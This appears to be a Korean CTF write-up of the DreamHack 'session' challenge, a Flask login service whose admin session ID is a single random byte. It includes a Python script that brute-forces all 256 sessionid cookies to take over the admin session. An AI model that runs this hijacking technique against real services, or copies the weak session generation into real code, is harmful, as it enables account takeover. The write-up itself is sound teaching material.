[DreamHack] 드림핵 웹해킹 : session

https://dreamhack.io/wargame/challenges/266

session

 

버프스위트 없이 할거다

python만 있으면 끝.

필자는 파이썬을 설치하지 않았기 때문에 Google Colab을 이용한다

VS Code, Replit 등 파이썬 돌아가는 프로그램 아무거나 사용 가능하다

 

문제

쿠키와 세션으로 인증 상태를 관리하는 간단한 로그인 서비스입니다.
admin 계정으로 로그인에 성공하면 플래그를 획득할 수 있습니다.

#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for

app = Flask(__name__)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG
}

session_storage = {
}

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        try:
            pw = users[username]
        except:
            return '<script>alert("not found user");history.go(-1);</script>'
        if pw == password:
            resp = make_response(redirect(url_for('index')) )
            session_id = os.urandom(4).hex()
            session_storage[session_id] = username
            resp.set_cookie('sessionid', session_id)
            return resp 
        return '<script>alert("wrong password");history.go(-1);</script>'

if __name__ == '__main__':
    import os
    session_storage[os.urandom(1).hex()] = 'admin'
    print(session_storage)
    app.run(host='0.0.0.0', port=8000)

 

취약점 분석

로그인 페이지에서 username과 password를 이용하여 로그인하는 서비스다

 

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        try:
            pw = users[username]
        except:
            return '<script>alert("not found user");history.go(-1);</script>'
        if pw == password:
            resp = make_response(redirect(url_for('index')) )
            session_id = os.urandom(4).hex()
            session_storage[session_id] = username
            resp.set_cookie('sessionid', session_id)
            return resp 
        return '<script>alert("wrong password");history.go(-1);</script>'

 

문제 파일에서 os.urandom(4).hex() 라는 부분이 수상쩍어서 검색해보니

4바이트의 무작위 값을 hex로 변환한다는 뜻이라고 한다

 

@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')

    return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

본 문제에서 로그인 로직은 다음과 같다

 

1. 로그인 화면에서 로그인을 한다

예시로 주어진 파일에 나와있는 username: user, password: user1234를 이용해서 설명하겠다

 

2. 비번이 맞으면 방금 로그인한 유저의 아이디를 암호화(랜덤화)해서 session_storage에 저장한다 

session_storage = {
	"84058120": "user"
}

 

 

3. 그리고 쿠키에 아래 형태로 저장하고 메인 화면으로 리다이렉션

cookie = {"sessionid" : "84058120"}

 

4. 메인화면에서는 쿠키에 있는 sessionid 값을 session_storage에서 대조하여 유저에 따라 다른 화면을 보여준다

여기서는 쿠키에 있는 sessionid 값이 84058120이다

session_storage["84058120"] = "user" 이다

"user" 라는 아이디에 대한 결과 값을 반환한다

 

 

따라서 메인화면에서 get 요청을 할 때 쿠키값에 admin에 해당하는 session_id만 넣어주면

admin이 로그인 했을 때의 결과를 반환한다는 뜻

비밀번호를 찾아내지 않고 sessionid 만 알아내면 로그인이 되는 취약한 시스템이다

 

if __name__ == '__main__':
    import os
    session_storage[os.urandom(1).hex()] = 'admin'
    print(session_storage)
    app.run(host='0.0.0.0', port=8000)

코드 내부를 보니 admin의 sessionid 값은 미리 만들어져서

session_storage에 이미 저장되어있다고 한다

 

그리고 이 sessionid는 urandom으로 정해진다

랜덤 1바이트의 16진수 값이다

 

풀이

1바이트라면 8비트로 0~255의 숫자고

이를 16진수로 변환하면 00, 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, ..., FE, FF 가 된다.

범위가 작기 때문에 부르트포스로 그냥 다 넣어서 확인해도 될 것 같다

 

import requests, os

url="http://host3.dreamhack.games:21743/"

for i in range(256):
  hex_value = format(i, "02x")
  response = requests.get(url, cookies={'sessionid': hex_value})
  print(f"{hex_value} : {len(response.text)}")

 

gpt의 도움을 받아 format() 함수를 이용해서 0부터 255까지의 수를 2자리 16진수로 바꿔서 

• '0': 변환된 문자열이 자릿수가 부족할 때 앞을 0으로 채우도록 지정합니다.
• '2': 최소 자릿수를 2자리로 지정합니다.
• 'x': 16진수로 표현합니다.

get 요청을 보낼 때 쿠키 안에 sessionid 로 넣어줬다

응답을 전부 출력하면 매우 길어질 예정이기에 길이만 출력하도록 했다

 

얼마 가지 않아 혼자서 응답길이가 1350인 수상쩍은 0a를 발견했다

 

import requests, os

url="http://host3.dreamhack.games:21743/"

response = requests.get(url, cookies={'sessionid': "0a"})
print(response.text)

찾은 "0a"를 쿠키에 넣어서 이번에는 전체 응답을 뽑아냈다

 

admin으로 인식해서 응답에 포함시켜준 플래그를 확인 가능하다